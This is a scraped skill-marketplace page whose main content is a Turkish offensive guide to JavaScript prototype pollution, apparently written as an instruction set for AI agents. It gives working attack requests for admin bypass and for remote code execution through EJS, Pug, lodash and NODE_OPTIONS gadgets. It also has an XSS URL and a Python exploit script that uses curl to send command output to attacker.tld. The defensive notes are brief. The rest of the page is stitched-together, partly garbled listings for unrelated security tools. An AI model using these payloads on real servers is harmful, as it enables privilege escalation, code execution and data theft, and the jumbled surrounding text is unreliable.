21st.dev Magic MCP — AI-powered UI component generation via natural language. Access to 21st.dev component library, SVGL brand logos, and real-time preview. Generate React/Tailwind components with /ui command.
日本語の概要は準備中です。原文の説明を表示しています。
JavaScript prototype pollution — Object.prototype'u kirleterek auth bypass, RCE, XSS gadget chains (server-side Node.js ve client-side)
インストール方法を見るインストールする前に、エージェントに与えられる指示の中身を確認できます。
Object.prototype Üzerinden KontrolJavaScript'in mirası: her object Object.prototype'tan miras alır. Eğer user input'unu derinlemesine bir nesneye merge ediyorsan ve user __proto__ veya constructor.prototype set ediyorsa, tüm uygulamadaki tüm object'lerin yeni özelliği olur. Auth bypass'tan RCE'ye uzanan saldırı zinciri başlangıcı.
İpuçları:
X-Powered-By: Express)_.merge(), _.set(), Object.assign(target, userInput)?a[b]=c veya ?a[__proto__][isAdmin]=truemergeOptions)lodash (< 4.17.21)merge, deepmergemongooseexpress (qs library körü)// Hedef kodu (savunmasız)
const config = {};
_.merge(config, JSON.parse(req.body));
if (config.isAdmin) {
// admin işlemleri
}
Saldırı request:
POST /api/save HTTP/1.1
Content-Type: application/json
{"__proto__": {"isAdmin": true}}
Sonuç: Object.prototype.isAdmin = true. Tüm {} {isAdmin: true} olur — if (config.isAdmin) true döner!
GET /?__proto__[isAdmin]=true HTTP/1.1
Express default qs parser bunu {__proto__: {isAdmin: 'true'}} olarak parse eder. Object.assign(req.user, req.query) polluted.
{"__proto__": {"polluted": "yes"}}
{"constructor": {"prototype": {"polluted": "yes"}}}
{"constructor.prototype.polluted": "yes"} // bazı parser'larda
// JSON.parse(...)["polluted"] === "yes" sonrasında
?__proto__[polluted]=yes
?constructor[prototype][polluted]=yes
?a[__proto__][b]=c
// Client-side test (browser console)
Object.prototype.polluted = "yes";
console.log(({}).polluted); // "yes" → polluted
// Tespit: response'da prototype değiştirme etkisi gör
Otomatik tools:
# Client-side PP scan
git clone https://github.com/dwisiswant0/ppmap
ppmap -u "https://target.tld"
# Server-side PP scan
git clone https://github.com/kosmosec/proto-find
proto-find -l urls.txt
POST /api/profile HTTP/1.1
Content-Type: application/json
Cookie: session=normalUser
{"__proto__": {"isAdmin": true}}
Sonra:
GET /api/admin HTTP/1.1
Cookie: session=normalUser
Admin endpoint kontrolü: if (req.user.isAdmin). req.user'da isAdmin field yok ama Object.prototype'tan miras alıyor → true.
Express + ejs/pug/handlebars + pollution → SSTI → RCE.
POST /api/save HTTP/1.1
{"__proto__": {"outputFunctionName": "x;process.mainModule.require('child_process').execSync('id');v"}}
Tetikleyici:
GET /any/page/that/renders/ejs HTTP/1.1
EJS template render ederken outputFunctionName polluted → kodun içine kötü kod enjekte → execSync('id') çalışır.
POST /api/save HTTP/1.1
{"__proto__": {"block": {"type": "Text", "line": "process.mainModule.require('child_process').execSync('id')"}}}
body-parser// body-parser PP
{"__proto__": {"jsonparseFn": "function() {return process.mainModule.require('child_process').execSync('id').toString()}"}}
// lodash.template
{"__proto__": {"sourceURL": "
return process.mainModule.require('child_process').execSync('id')"}}
// lodash.zipObjectDeep
_.zipObjectDeep(['__proto__.isAdmin'], [true]);
// Mongoose model save
const user = new User(req.body); // body: {"__proto__": {"isAdmin": true}}
user.save();
// Mongoose query
User.findOne(req.body); // {"__proto__": {"$regex": "/.*/"}} → tüm kullanıcılar
Client-side PP (jQuery, lodash on frontend) + DOM sinks (innerHTML, eval) = stored XSS.
Saldırı URL'si:
https://target.tld/?__proto__[src]=data:,alert(1)//
jQuery $.extend() kullanıyorsa, Object.prototype.src set → tüm <img>'lerin src'si polluted → tetiklenir.
| Gadget Property | Etkilediği Yer | Sonuç |
|---|---|---|
isAdmin, admin, role | Auth kontrol | Privilege escalation |
outputFunctionName | EJS template | RCE |
sourceURL | lodash.template | RCE (\n inject) |
block.type, block.line | Pug | RCE |
shell, env, argv0, NODE_OPTIONS | child_process.spawn | RCE |
extension, _default | Marked, fs | LFI/path traversal |
proxy | http requests | SSRF |
cookies, cookie | Express cookie | Session hijack |
NODE_OPTIONS Inject (En Güçlü RCE)POST /api/config HTTP/1.1
{"__proto__": {"env": {"NODE_OPTIONS": "--require=/tmp/exploit.js"}, "shell": "node"}}
Sonra Node child_process.spawn(...) veya benzer çağrı yapıldığında /tmp/exploit.js execute olur.
// /tmp/exploit.js içine yazılan dosya
require('child_process').execSync('id > /tmp/pwned');
Detaylı: https://blog.sonarsource.com/blitzjs-prototype-pollution/
function detectPP() {
return {}.polluted !== undefined;
}
// Tüm prototype zincirini test et
function deepCheck(obj) {
for (const k of ['__proto__', 'constructor', 'prototype']) {
if (k in obj) return true;
}
return false;
}
# pp_exploit.py
import requests
URL = 'https://target.tld'
# 1. Pollute Object.prototype
pollute = {"__proto__": {"isAdmin": True, "outputFunctionName": "x;require('child_process').execSync('curl http://attacker.tld/$(id|base64)');v"}}
r = requests.post(f'{URL}/api/save', json=pollute, cookies={'sess': 'abc'})
print('Pollute:', r.status_code, r.text[:200])
# 2. Tetikle (template render)
r = requests.get(f'{URL}/profile', cookies={'sess': 'abc'})
print('Trigger:', r.status_code)
# 3. Out-of-band callback'i kontrol et
# attacker.tld access log'una bak
__proto__ field engellenebilir — JSON.parse default __proto__'yu Object'e koyar mı? Hayır, raw key olarak kalır. Ama _.merge recurse ederken __proto__'ya yazar. Bazı kütüphaneler bunu engeller.Object.create(null) — prototype'sız object oluşturmak savunma. Bunu kullanan endpoint'lerde PP çalışmaz.__proto__ yazımı throw eder ama _.merge strict değil.Object.freeze(Object.prototype) ile prototype dondurulmuş → PP olmaz.Node.js / JavaScript backend → object merge tespit
├── _.merge / Object.assign user input → PP test
├── PP başarılı → gadget ara
│ ├── EJS/Pug → RCE
│ ├── child_process → NODE_OPTIONS RCE
│ ├── isAdmin → auth bypass
│ └── DOM sink → client-side XSS
└── PP yok → diğer web skill'lere bak
# Client-side PP scanner
git clone https://github.com/dwisiswant0/ppmap
# Tarayıcı eklentisi: PortSwigger PP Burp extension
# Server-side scan
pip install ppfuzz # yarın çıkacak ama benzer projeler
git clone https://github.com/kosmosec/proto-find
# Manual
# Burp + repeater + Pollute payload'ları
まだレビューはありません。使ってみた感想をお寄せください。
概要と使いどころ
21st.dev Magic MCP — AI-powered UI component generation via natural language. Access to 21st.dev component library, SVGL brand logos, and real-time preview. Generate React/Tailwind components with /ui command.
日本語の概要は準備中です。原文の説明を表示しています。
AES CBC/ECB modlarına karşı kriptografik bütünlük saldırıları — bit flipping, IV manipulation, ECB cut-and-paste, CBC-MAC length extension, IV reuse
日本語の概要は準備中です。原文の説明を表示しています。
AES-GCM ve ChaCha20-Poly1305 nonce yeniden kullanımı saldırısı — GF(2^128) polinom kök bulma ile Hash Key kurtarma ve MAC sahteciliği.
日本語の概要は準備中です。原文の説明を表示しています。
tespit etmeabnormal access patterns in AWS S3, GCS, and Azure Blob Storage by analyzing CloudTrail Data Events, GCS audit logs, and Azure Storage Analytics. Identifies after-hours bulk downloads, access from new IP addresses, unusual API calls (GetObject spikes), and potential data exfiltration using statistical baselines and time-series anomaly Tespit.
日本語の概要は準備中です。原文の説明を表示しています。
Perform static and symbolic analysis of Solidity smart contracts using Slither and Mythril to tespit etmereentrancy, integer overflow, access control, and other vulnerability classes before Dağıt:ment to Ethereum mainnet.
日本語の概要は準備中です。原文の説明を表示しています。
Parses Kubernetes API server audit logs (JSON lines) to tespit etmeexec-into-pod, secret access, RBAC modifications, privileged pod creation, and anonymous API access. Builds threat Tespit rules from audit event patterns. Use investigating yaparken Kubernetes cluster compromise or building k8s-specific SIEM Tespit rules.
日本語の概要は準備中です。原文の説明を表示しています。